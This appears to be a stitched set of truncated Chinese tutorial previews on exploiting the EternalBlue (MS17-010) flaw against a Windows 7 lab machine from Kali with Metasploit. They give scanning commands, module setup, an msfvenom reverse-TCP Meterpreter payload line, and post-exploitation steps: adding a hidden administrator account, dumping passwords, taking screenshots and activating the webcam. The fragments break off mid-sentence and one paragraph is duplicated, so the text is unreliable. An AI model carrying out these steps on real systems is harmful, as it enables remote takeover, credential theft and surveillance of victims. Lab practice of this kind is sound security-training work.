1.search漏洞名称或者代号，永恒之蓝的是ms17_010（win10和win11无这个漏洞），exploit攻击利用脚本是进行漏洞攻击,auxiliary辅助是检测漏洞是否存在2.use模块前面的数字或者全称3.查看当前模块的设置，showoptions4.关闭目标机win8的防火墙，ping通kali5.用setRHOSTS目标机ip地址，把win8设置为目标机win8出现的问题：渗透之路暂时终止，等我找到能用的win7镜像再继续在终端sudosu输入密码后写一句话木马：msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=192.168

                                   warning本文目的并不是教会学者入侵win7主机,而是加强防范kali入侵win7步骤一：实验环境的搭建攻击机：kali（2022.3版本）靶机：win7专业版sp1x64位安装好上面两个环境后分别都打开kali环境： Windows7环境： 让我们查找win7IP地址打开终端输入nmap-sP输入kali的IP地址/24发现有4个IP地址 使用nmap扫描这几个ipnmap-O输入扫描好的IP地址 可以看到445端口是打开状态而且系统是Windows打开终端输入msfconsole出现这样界面就可以了 每次打开msf工

一、漏洞简介1、永恒之蓝介绍:永恒之蓝漏洞（MS17-010），它的爆发源于WannaCry勒索病毒的诞生，该病毒是不法分子利用NSA（NationalSecurityAgency，美国国家安全局）泄露的漏洞“EternalBlue”（永恒之蓝）进行改造而成。勒索病毒的肆虐，俨然是一场全球性互联网灾难，给广大电脑用户造成了巨大损失。据统计，全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。2、漏洞原理：永恒之蓝漏洞通过TCP的445和139端口，来利用SMBv1和NBT中的远程代码执行漏洞，通过恶意代码扫描并攻击开放445文件共享端口的Windows主机。只要用户主机开机联网，

1.kali中进入meterpreter命令行（在第一篇命令的基础上，就已经进入了meterpreter命令了），可以执行ipconfig命令看到目标机器IP等2. 通过shell命令能直接拿到win7的shell，执行任意命令（因这里是中文所以出现了乱码）3.下面我们就可以直接创建用户并添加至管理员组“netuserwwty123123/add”是创建用户“netlocalgroupadministratorswwty/add”是添加至管理员组“netuser”使用该命令可以查看是否已经创建成功4.我们还可以在靶机上使用netuserwwty命令，查看到该用户确实成为管理员组了 5.在靶机w

第一节渗透测试-概述1.1渗透测试定义渗透测试是对用户信息安全措施积极评估的过程。通过系统化的操作和分析，积极发现系统和网络中存在的各种缺陷和弱点，如涉及缺陷和技术缺陷。渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法，这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。渗透测试的意义:站在第三者的角度来思考企业系统的安全性。渗透测试通常具有两个显著特点：渗透测试是一个渐进的且逐步深入的过程渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试1.2渗透测试分类1.2.1渗透测试方法分类1.2.1.1黑盒测试黑盒测试：也可叫功能测试，是一种从用户角度出发的测试

第一节渗透测试-概述1.1渗透测试定义渗透测试是对用户信息安全措施积极评估的过程。通过系统化的操作和分析，积极发现系统和网络中存在的各种缺陷和弱点，如涉及缺陷和技术缺陷。渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法，这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。渗透测试的意义:站在第三者的角度来思考企业系统的安全性。渗透测试通常具有两个显著特点：渗透测试是一个渐进的且逐步深入的过程渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试1.2渗透测试分类1.2.1渗透测试方法分类1.2.1.1黑盒测试黑盒测试：也可叫功能测试，是一种从用户角度出发的测试

环境说明机器ip地址Kali主机192.168.231.129win7靶机192.168.231.143一、获取目标主机的管理员权限1.使用kali虚拟机作为攻击机，利用nmap扫描获取目标的IP地址及漏洞，将两个机器包括一个攻击机Kali、win7的网络连接模式都是NAT，即在一个网段里面，然后进行扫描网段，查看存活主机，下面是两台机器的ip地址查看，可以看到两台机器在同一个网段内，即网段都在192.168.231中2.然后可以使用命令：Nmap-v–sP192.168.231.1/24进行网段扫描，可以看到140和143的主机是存活的（因为这里我还开了一台靶机WindowsXP，该实验同样

目录1MSF框架1.1MSF简介1.2MSF五大模块类型1.3渗透攻击步骤1.4小结2实验简介2.1永恒之蓝简介2.2实验环境2.3实验目的3实验前准备3.1MSF启动、退出、更新3.2MSF启动与更新实操4主机扫描4.1使用辅助模块进行端口扫描4.2使用辅助模块进行服务扫描4.3使用Nmap扫描5漏洞探测及利用5.1漏洞探测5.2漏洞利用5.3小结6总结参考文献1MSF框架1.1MSF简介Metasploit框架（MetasploitFramework,MSF）是一个开源工具，旨在方便渗透测试，它是由Ruby程序语言编写的模板化框架，具有很好的扩展性，便于渗透测试人员开发、使用定制的工具模板

目录一、永恒之蓝（EternalBlue）二、实验环境1.软件：VMwareWorkstations14以上版本2.虚拟机：Kali-Linux、Windows7 三、永恒之蓝实验1.打开终端使用命令行查看ip地址，并测试是否能互通2.主机发现3.启动msf4.查看漏洞模块5.扫描过程6.攻击过程7.显示远程主机系统信息：sysinfo8.通过meterpreter获取屏幕快照：screenshot9.上传文件到Windows主机，并从Windows主机中下载文件10.获得windows登录用户名和密码11.打开被攻击机摄像头一、永恒之蓝（EternalBlue）  永恒之蓝相关病毒，其实是利

目录1.启动msf2.检查msf库里是否存在ms17-010漏洞3.扫描靶机开放端口4.配置目标ip，本地ip并利用exploit进行攻击5.查看靶机系统信息、用户身份并对远程主机当前屏幕截图6.获得shell控制台进cmd操作，添加账户提升权限7.远程登录靶机8.输入添加的账户密码，登录成功环境：攻击机：kali 192.168.10.2     靶机：win7 192.168.10.31.启动msf#msfconsole2.检查msf库里是否存在ms17-010漏洞msf6>searchms173.扫描靶机开放端口#nmap-sV192.168.10.34.配置目标ip，本地ip并利用ex